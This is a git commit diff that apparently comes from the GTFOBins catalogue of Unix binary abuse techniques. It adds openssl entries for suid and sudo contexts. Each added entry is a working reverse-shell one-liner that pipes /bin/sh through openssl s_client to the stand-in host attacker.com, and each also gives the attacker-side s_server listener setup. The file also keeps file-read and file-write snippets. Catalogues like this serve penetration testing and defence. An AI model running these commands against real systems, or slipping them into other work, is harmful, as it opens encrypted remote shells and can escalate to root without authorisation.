Add suid/sudo accordingly to openssl

2024-09-19 02:11:39 +02:00 · 2019-03-06 14:08:42 +01:00 · 2019-03-06 14:08:42 +01:00 · 58e517563c
commit 58e517563c
parent 60af774288
1 changed files with 23 additions and 3 deletions
--- a/_gtfobins/openssl.md
+++ b/_gtfobins/openssl.md
@ -52,11 +52,31 @@ functions:
        LFILE=file_to_read
        openssl enc -in "$LFILE"
  suid:
+    - description: |
+        To receive the shell run the following on the attacker box:
+
+            openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
+            openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
+
+        Communication between attacker and target will be encrypted.
+      code: |
+        RHOST=attacker.com
+        RPORT=12345
+        mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
+
    - code: |
        LFILE=file_to_write
        echo DATA | openssl enc -out "$LFILE"
  sudo:
-    - code: |
-        LFILE=file_to_write
-        echo DATA | sudo openssl enc -out "$LFILE"
+    - description: |
+        To receive the shell run the following on the attacker box:
+
+            openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
+            openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
+
+        Communication between attacker and target will be encrypted.
+      code: |
+        RHOST=attacker.com
+        RPORT=12345
+        mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
 ---